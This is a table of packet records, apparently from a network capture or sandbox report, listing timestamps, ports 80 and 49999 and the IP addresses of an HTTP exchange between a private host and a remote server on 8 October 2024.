Oct 8, 2024 11:31:43.722083092 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.722136974 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.723964930 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.723977089 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.723988056 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.724035025 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.724044085 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.724055052 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.724059105 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.724107027 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.724107981 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.724251032 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.724261999 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.724311113 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.724387884 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.724399090 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.724409103 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.724431038 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.724473000 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.724473953 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.724756956 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.724767923 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.724777937 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.724822044 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.724832058 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.724888086 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.725089073 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.725272894 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.725320101 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.725331068 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.725367069 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.725367069 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.725414991 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.725425959 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.725436926 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.725446939 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.725487947 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.725487947 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.725693941 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.725703955 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.725713968 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.725725889 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.725769997 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.725769997 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.726032972 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.726043940 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.726054907 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.726066113 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.726088047 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.726110935 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.726130009 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.726140976 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.726150990 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.726166964 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.726176977 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.726187944 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.726191998 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.726191998 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.726191998 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.726197958 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.726210117 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.726218939 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.726231098 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.726257086 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.726257086 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.726257086 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.726989031 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.726999998 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.727010012 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.727020025 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.727029085 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.727039099 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.727049112 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.727089882 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.727089882 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.727089882 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.727097988 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.727108002 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.727121115 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.727129936 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.727140903 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.727149963 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.727159977 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.727170944 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.727183104 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.727186918 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.727186918 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.727193117 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.727204084 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.727246046 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.727246046 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.728857994 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.728868008 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.728878975 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.728941917 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.728941917 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.729006052 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729016066 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729026079 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729034901 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729044914 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729053974 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729064941 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729069948 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.729069948 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.729074955 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729085922 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729095936 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729105949 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729116917 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729131937 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.729131937 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.729223013 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.729223013 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.729269028 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729280949 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729293108 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729302883 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729365110 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.729365110 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.729609013 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729619980 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729629993 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729671955 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.729758024 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729768038 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729778051 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729787111 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729799032 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729808092 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729816914 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729830027 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729830980 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.729830980 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.729846954 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729849100 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.729860067 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729870081 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729873896 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.729873896 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.729882002 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729893923 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729903936 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729914904 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729924917 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729944944 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729952097 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.729952097 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.729952097 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.729957104 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.729969025 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.730043888 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.730043888 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.730799913 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.730813980 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.730825901 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.730838060 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.730849028 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.730859995 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.730870962 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.730907917 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.730907917 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.730907917 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.730937004 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.730947971 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.730957031 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.730967045 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.730978012 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.730978012 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.730988026 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.730998993 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.731014967 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.731024981 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.731029034 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.731029034 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.731034994 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.731045008 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.731054068 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.731065035 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.731077909 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.731091022 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.731101036 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.731112957 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.731125116 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.731125116 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.731137991 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.731165886 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.731303930 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.731395960 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.731408119 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.731420040 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.731431961 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.731441975 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.731455088 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.731455088 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.731476068 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732116938 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732126951 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732142925 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732153893 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732163906 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732168913 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732177019 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732180119 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732189894 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732199907 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732208014 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732227087 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732254028 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732264042 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732274055 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732283115 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732290983 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732290983 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732292891 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732302904 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732314110 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732321024 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732400894 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732400894 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732403040 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732413054 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732423067 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732434988 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732443094 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732445955 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732456923 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732465982 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732475996 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732486963 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732496977 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732511997 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732516050 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732516050 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732516050 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732527018 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732538939 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732547998 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732558012 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732558012 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732570887 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732578039 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732583046 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732592106 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732603073 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732614994 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732676029 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732676029 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732726097 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732737064 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732748032 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732757092 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732765913 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732784033 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732794046 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732804060 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732816935 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732825041 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732825041 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732825041 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732825041 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732836008 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.732903957 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.732903957 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777012110 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777065039 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777074099 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777128935 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777162075 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777173042 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777182102 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777192116 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777215004 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777225018 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777231932 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777231932 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777235985 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777245998 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777256966 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777292013 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777292013 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777292013 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777358055 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777374029 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777383089 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777393103 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777404070 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777414083 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777425051 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777437925 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777439117 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777437925 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777492046 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777494907 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777494907 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777522087 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777533054 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777540922 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777553082 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777563095 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777571917 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777581930 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777590990 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777595997 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777595997 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777595997 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777601004 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777615070 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777631044 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777631998 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777631998 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777641058 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777647018 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777647018 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777658939 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777667999 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777678013 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777688026 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777697086 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777707100 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777707100 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777707100 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777709961 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777720928 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777734995 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777746916 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777756929 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777766943 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777770042 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777770042 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777770042 CEST	49999	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:43.777779102 CEST	80	49999	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:43.777792931 CEST	80	49999	63.250.38.167	192.168.2.6
